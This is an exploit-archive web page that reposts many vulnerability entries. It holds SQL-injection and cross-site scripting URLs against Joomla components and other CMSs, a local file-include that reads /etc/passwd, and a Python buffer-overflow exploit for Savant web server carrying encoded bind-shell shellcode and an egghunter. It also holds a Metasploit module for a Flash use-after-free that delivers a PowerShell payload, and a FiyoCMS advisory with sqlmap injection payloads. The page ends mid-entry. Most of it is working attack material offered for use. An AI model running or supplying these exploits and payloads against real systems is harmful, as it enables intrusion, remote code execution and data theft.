Contributors to this blog

  • HireHackking


source: https://www.securityfocus.com/bid/51617/info

The 'com_sanpham' component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_sanpham&view=sanpham&kindid=[SQLi]
http://www.example.com/index.php?option=com_sanpham&view=product&task=detail&modelsid=1&cid=[SQLi]
http://www.example.com/index.php?option=com_sanpham&view=product&modelsid=[SQLi]
http://www.example.com/index.php?option=com_sanpham&view=product&markid=1&modelsid=[SQLi] 
            
source: https://www.securityfocus.com/bid/51616/info

The Full ('com_full') component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_full&dzial=dam_prace&id=[SQLi] 
            
source: https://www.securityfocus.com/bid/51613/info

The 'com_br' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_br&controller=../../../../../../../../../../../../../etc/passwd%00 
            
source: https://www.securityfocus.com/bid/51614/info

Tribiq CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?id=[SQLi] 
            
source: https://www.securityfocus.com/bid/51608/info

Acidcat ASP CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Acidcat ASP CMS 3.5.1 and 3.5.2 are vulnerable; other versions may also be affected. 

http://www.example.com/admin/admin_colors.asp?"><script>alert('XSS')</script>

http://www.example.com/admin/admin_config.asp?"><script>alert('XSS')</script>

http://www.example.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script> 
            
source: https://www.securityfocus.com/bid/51607/info

Savant web server is prone to a buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Savant web server 3.1 is vulnerable; other versions may also be affected.

#!/usr/bin/env python3
# Savant Web Server 3.1 remote buffer overflow PoC (SecurityFocus BID 51607),
# ported to Python 3: string literals are now bytes, payload content unchanged.
import socket

target_address = "10.10.10.129"
target_port = 80

# Stage 2: egg tag followed by the bind shell. The tag is doubled so the hunter
# does not stop on the single copy embedded in its own code.
buffer2 = b"R0cX" + b"R0cX"
# msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c
buffer2 += (b"\xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
            b"\x6a\x83\xc0\x04\x31\x68\x10\x03\x68\x10\x0e\xc2\x4a\xa1\x17"
            b"\x59\x49\xc2\xff\x91\x58\x90\x5d\x29\xec\xb0\x10\xb1\x92\xd3"
            b"\xae\x07\xc5\x35\x4d\x38\xf3\xdb\x06\xfc\xec\x5f\xa5\x66\x93"
            b"\xcc\x5d\x07\x81\xcb\xcc\x59\x35\x45\xd6\x2d\x15\xa1\xe7\xbb"
            b"\xd6\x5d\x68\x57\x1b\x2a\x4f\xe8\xdd\xd3\xc0\x84\x0c\x0e\xb7"
            b"\x03\x24\xc7\xfd\xd2\xa5\x88\x89\xf8\x07\x82\x1b\xcb\x2d\x3b"
            b"\xfd\x9d\x67\xa9\xff\xe9\x20\x9e\xa9\x25\x8b\x7c\xda\xd9\x01"
            b"\x32\x51\x36\x9a\xe7\x73\x8f\xe5\xea\x60\xa6\x4c\x78\xef\xbb"
            b"\x1e\x37\xd0\xbd\xaa\x4f\xe7\x94\x3e\x02\x34\x21\xc6\xc1\xe2"
            b"\xa3\x6f\x76\x92\x9a\xed\xda\x19\x2d\xca\x21\xb2\xb0\xa9\xb5"
            b"\x72\xa1\xbb\xd0\x18\x64\xd3\xb4\x85\x0c\x92\xf7\x07\xcf\x13"
            b"\xc2\x95\x57\x0a\x68\x6d\x94\x6f\x5a\xad\xd1\x82\x26\x9f\x3c"
            b"\x0d\x2b\xdc\x06\x6a\xd3\x87\x24\x9c\x14\x58\x71\x42\xef\x1b"
            b"\x90\xdc\x46\x67\x51\xd3\x4c\xc4\x11\x23\x29\xbd\xc5\xab\x96"
            b"\x54\x5e\xb6\x08\x60\x42\x5f\x7a\x76\xdf\x30\x05\x76\xb7\xd1"
            b"\xf2\x49\xba\x14\x69\xa7\x7b\xa8\x6b\xb9\xad\xc8\x8e\x0f\x9e"
            b"\x07\x7f\xa7\x89\x9b\x4d\x68\xbd\x45\x77\xe0\x64\xec\xa2\x18"
            b"\x2d\x6f\x10\xc3\x14\x1d\x4e\x92\x3a\x8a\xf0\xd8\x07\x12\x19"
            b"\x27\x0c\x23\xe4\x0b\xbb\x6d\x97\xf8\xe8\x8c\x23\xb5\xe0\x22"
            b"\xe8\x70\x85\x10\xbb\x64\xbe\x09\x41\xe7\x2d\x6d\x39\xfb\xcc"
            b"\x09\xee\xca\x8f\x83\x22\x5d\x77\x2b\x5b\xc6\x1b\x82\x6e\x17"
            b"\x03\xe8\x6c\x35\x55\x71\xd4\x35\x72\x12\x3f\x11\x6e\xcf\x09"
            b"\x5a\xd0\x33\x40\x8e\x3f\x36\xbf\xd7\xd0\x85\x17\x03\xd3\xc4"
            b"\x7f\x17\x6e\xe8\x0d\xa6\x5f\x9e\xd6\x1b\xf4\x2b\x8c\xb3\xad"
            b"\x19\xb3\x70\xac\x56\x76\x0c\xfb\x4f\xc4\x99\xdd\x99\x75\x8f"
            b"\xa8\xfa\x91\x5c\xfb\x26\xbd\x8a\xea\xec\x0d\xf1\x45\x4f\x72"
            b"\xd1\x02\x47\x9c\xa5\x33\x1e\xf8\xc7\x00\xd2\x3d\x86\xb4\x7c"
            b"\xb9\x85\x5f\x8c\x40\x58\x7e\x7c\x5d\x76\x3a\xd6\x0b\x9e\xfe"
            b"\x88\xc7\x60\x56\x99\x19\x7f\x7a\xda\x93\x72\x99\x3f\x69")

# Stage 1: 32-byte egghunter searching for R0cX, then NOP padding up to the
# saved return address at offset 254.
badbuffer = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
badbuffer += b"\x90" * (254 - len(badbuffer))
# EIP overwrite: 00401D09 in savant.exe (POP EBP; RETN). Only three bytes are
# written; the address's leading 0x00 comes from the string terminator.
badbuffer += b"\x09\x1D\x40"
# The HTTP method field carries a tiny x86 stub: MOV AL, 3; ADD AL, 1; JPO +0x14
httpmethod = b"\xb0\x03\x04\x01\x7B\x14"

sendbuf = httpmethod + b" /%" + badbuffer + b"\r\n\r\n" + buffer2

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.sendall(sendbuf)
sock.close()
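The PoC above stages its payload in two parts: a short hunter that fits in the overflowed buffer, and the real shellcode that lands elsewhere in memory behind a doubled "R0cX" tag. The Python below is an added example, not part of the original exploit, that models those mechanics offline: it derives the 3-byte partial EIP overwrite from the PoC's 0x00401D09 address, checks stage 1 for bytes that would break the HTTP request line (the bad-character set is an assumption), and simulates the hunter's scan over a constructed memory image to show why the single copy of the tag inside the hunter's own code must not count as a match.

```python
import struct

EGG = b"R0cX"
# The 32-byte egghunter from the PoC above (Skape's NtAccessCheckAndAuditAlarm variant).
HUNTER = bytes.fromhex(
    "6681caff0f42526a0258cd2e3c055a74ef"
    "b852306358"          # mov eax, 'R0cX'  <- the hunter's own copy of the egg
    "8bfaaf75eaaf75e7ffe7")
RET_ADDR = 0x00401D09    # POP EBP; RETN in savant.exe, as used by the PoC


def partial_overwrite(addr):
    """The three low bytes of a little-endian address. The PoC writes only these
    at offset 254 because the address starts with 0x00, which the string copy's
    terminator supplies for free."""
    packed = struct.pack("<I", addr)
    if packed[3] != 0:
        raise ValueError("only addresses with a 0x00 high byte can be truncated to 3 bytes")
    return packed[:3]


def has_bad_chars(stage, bad=b"\x00\r\n "):
    """True if the stage contains a byte that would terminate or split the HTTP
    request line it travels in (assumed bad-character set for this target)."""
    return any(b in stage for b in bad)


def build_stage1(hunter=HUNTER, ret=RET_ADDR, eip_offset=254):
    """Hunter, NOP padding up to the saved return address, then the 3-byte overwrite."""
    return hunter + b"\x90" * (eip_offset - len(hunter)) + partial_overwrite(ret)


def hunt(memory, egg=EGG):
    """Simulates what the hunter does at run time: scan for two consecutive
    copies of the egg and return the offset just past them (the shellcode),
    or -1. One copy is not enough because the hunter itself contains the tag."""
    needle = egg + egg
    pos = memory.find(needle)
    return -1 if pos < 0 else pos + len(needle)


def demo():
    """Constructed process image: stage 1 in one region, stage 2 (doubled egg
    plus a stub standing in for the bind shell) somewhere else, as after the
    PoC's request. Returns (offset of the first single egg, hunt result,
    whether the hunt landed exactly on the stub)."""
    stub = b"\xcc" * 8
    memory = (b"\x41" * 64 + build_stage1() + b"\x00" * 200
              + EGG + EGG + stub + b"\x00" * 16)
    off = hunt(memory)
    return memory.find(EGG), off, memory[off:off + len(stub)] == stub


if __name__ == "__main__":
    print("EIP bytes:", partial_overwrite(RET_ADDR).hex())   # 091d40
    print("stage 1 clean:", not has_bad_chars(build_stage1()))
    print("first single egg / hunt result / landed on stub:", demo())
```

The first value demo() returns is the offset of the hunter's own "R0cX" (the mov eax immediate), which comes well before the doubled tag; a hunter that matched a single copy would stop there and execute its own code as shellcode.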
            
source: https://www.securityfocus.com/bid/51597/info

Syneto Unified Threat Management is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.

Unified Threat Management 1.4.2 and 1.3.3 Community Edition are vulnerable; other versions may be affected. 

Proof of Concept:
=================
The vulnerabilities can be exploited by privileged user accounts, low-privileged viewers, or by remote attackers with the required user interaction.
For demonstration or to reproduce ...

1.1.1

[+] Reports - Executive Summary - Output Listing Category

<tr id="list_1" class="tableRowEven">
<td class="status" valign="top" align="center">
<a href="#" title="Disable the reporting list" class="disableList"><img src="img/enabled.gif"
title="disable" alt="disable" class="disable"></a>
<a style="display: none;" href="#" title="Enable the reporting list" class="enableList">
<img src="img/disabled.gif" title="enable" alt="enable" class="enable"></a>
				</td>
<td valign="top"> "><EXECUTION OF PERSISTENT SCRIPT CODE!>&#039; <<="" td="">
<td valign="top" nowrap="nowrap">
<a href="#" id="list_1" class="editList"><img src="img/edit.gif" title="Edit" alt="Edit"
 /></a>
<a href="syneto.php?menuid=307&action=delete&id=1" class="deleteList"><
;img src="img/delete.gif" title="Delete" alt="Delete" /></a>
</td>
</tr>
</tbody>
	</table>
	</div>


Reference(s):
https://www.example.com.com/syneto.php?menuid=307



1.1.2
[+] EMail - Filter Add & Configure

<div>Sender = >"<EXECUTION OF PERSISTENT SCRIPT CODE!">.*</div>						    							<div>Receiver = .*</div>
<div>Subject = .*(SPAM|VIAGRA).*</div>
						
Reference(s):
https://www.example.com.com/syneto.php?menuid=63



1.1.3
[+] EMail Settings - New Domain

">
<table class="data" id="smtpDomainsList">
	<thead>
		<tr>
			<th class="status">Status</th>
			<th class="domain">Domain</th>
			<th class="routing">Routing</th>
			<th class="verify_sender">Verify sender</th>
			<th class="qdm">Send digest</th>
			<th class="actions">Actions</th>
		</tr>
	</thead>
	<tbody>

<tr id="domain_3" class="tableRowEven editableDomain "><EXECUTION OF PERSISTENT SCRIPt CODE!><td class="status">
<input name="active" value="1" type="hidden">
<input name="qdm_enabled" value="" type="hidden">
<input name="qdm_hours" value="23" type="hidden">
<input name="admin_email" value=""><script>EXECUTION OF PERSISTENT SCRIPt CODE!</script>" type="hidden">
<input name="verify_peer" value="" type="hidden">
<input name="prefix_digest_links" value="" type="hidden"><EXECUTION OF PERSISTENT SCRIPT CODE!>" />

<input name="verify_sender" value="" type="hidden">
<input name="verify_sender_network_name" value="" type="hidden"><input name="qdm_exceptions" value="" type="hidden">
<input name="whitelist" value="" type="hidden">
<input name="blacklist" value="" type="hidden"><img class="clickable tooltip" title="" src="img/enabled.gif">
</td>
<td class="domain">"><script>alert(vulnerabilitylab)</script></td>


Reference(s):
https://www.example.com.com/syneto.php?menuid=60



1.2

PoC:
https://www.example.com.com/index.php?error=need_login"&#039;><frame src=http://www.vulnerability-lab.com><hr>&from_menu=238
https://www.example.com.com/index.php?info=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert(%22vulnerabilitylab%22)//%22%3E


Reference(s):
https://www.example.com.com/index.php?error=need_login"&#039;>EXECUTION OF PERSISTENT SCRIPT CODE!<hr>&from_menu=238
https://www.example.com.com/index.php?info=<EXECUTION OF PERSISTENT SCRIPT CODE!>%20%3E
            
source: https://www.securityfocus.com/bid/51596/info

Snitz Forums 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/forum.asp?TOPIC_ID=[SQL] 
            
source: https://www.securityfocus.com/bid/51571/info

Vastal EzineShops is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/mag/view_mags.php?cat_id=4'a 
            
source: https://www.securityfocus.com/bid/51549/info

OneOrZero AIMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

OneOrZero AIMS 2.8.0 Trial build 231211 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player ByteArray With Workers Use After Free',
      'Description'         => %q{
        This module exploits a use-after-free vulnerability in Adobe Flash Player. The
        vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
        is freed from an ActionScript worker, which can then fill the freed memory and
        notify the main thread to corrupt the new contents. This module has been tested
        successfully on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.296.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Vulnerability discovery and exploit in the wild
          'hdarwin', # Public exploit by @hdarwin89 (all the magic)
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-0313'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-02.html'],
          ['URL', 'http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2015-0313-the-new-flash-player-zero-day/']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          :flash   => lambda { |ver| ver =~ /^16\./ && ver == '16.0.0.296' },
          :arch    => ARCH_X86
        },
      'Targets'             =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Feb 02 2015',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0313', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end

end
            
# Exploit Title: FiyoCMS Multiple Vulnerabilities
# Date: 29 March 2015
# Exploit Author: Mahendra
# Vendor Homepage: www.fiyo.org
# Software Link: http://sourceforge.net/projects/fiyo-cms/
# Version: 2.0.1.8, other version might be vulnerable.
# Tested : Kali Linux 1.0.9a-amd64
# CVE(s): CVE-2014-9145,CVE-2014-9146,CVE-2014-9147,CVE-2014-9148

*Advisory Timeline*
30-11-2014: Vendor notified and responded back
01-12-2014: Vulnerabilities provided to vendor
14-03-2015: Vendor released newer version claimed to fix the vulnerabilities
29-03-2015: Advisory released

----------------------------------------------------
FiyoCMS 2.0.1.8 SQL injection, XSS, Direct URL bypass
----------------------------------------------------
*Advisory details*

Several security issues have been identified on the latest FiyoCMS platform.


*Proof of Concept (PoC)*

----------------------------------------------------
Multiple SQL Injection - CVE-2014-9145
----------------------------------------------------

* PoC:

http://192.168.248.132/fiyo/dapur/index.php?app=user&act=edit&id=1[sqli]

* Sqlmap:

Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: app=user&act=edit&id=-7672 UNION ALL SELECT NULL,NULL,CONCAT(0x7171676471,0x66457070464452786c58,0x716a767471),NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: app=user&act=edit&id=1 AND SLEEP(5)

* PoC:

http://192.168.248.132/fiyo/dapur/apps/app_article/controller/article_list.php?cat=[sqli]&user=[sqli]&level=[sqli]&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

* Sqlmap:

Parameter: cat
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=' AND (SELECT 4352 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (4352=4352) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yeEe'='yeEe&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4f654364434f746c7477,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat=' AND 2332=BENCHMARK(5000000,MD5(0x4a495770)) AND 'RlLS'='RlLS&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

Parameter: level
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=&user=&level=' AND (SELECT 6522 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (6522=6522) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pqqp'='Pqqp&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat=&user=&level=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71666f7671,0x6163446a67456e557a48,0x7164687671),NULL,NULL,NULL#&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat=&user=&level=' AND 6567=BENCHMARK(5000000,MD5(0x57586864)) AND 'hMLH'='hMLH&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

  
Parameter: user
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=&user=' AND (SELECT 8990 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (8990=8990) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VhKM'='VhKM&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat=&user=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4652577247546e6b5241,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
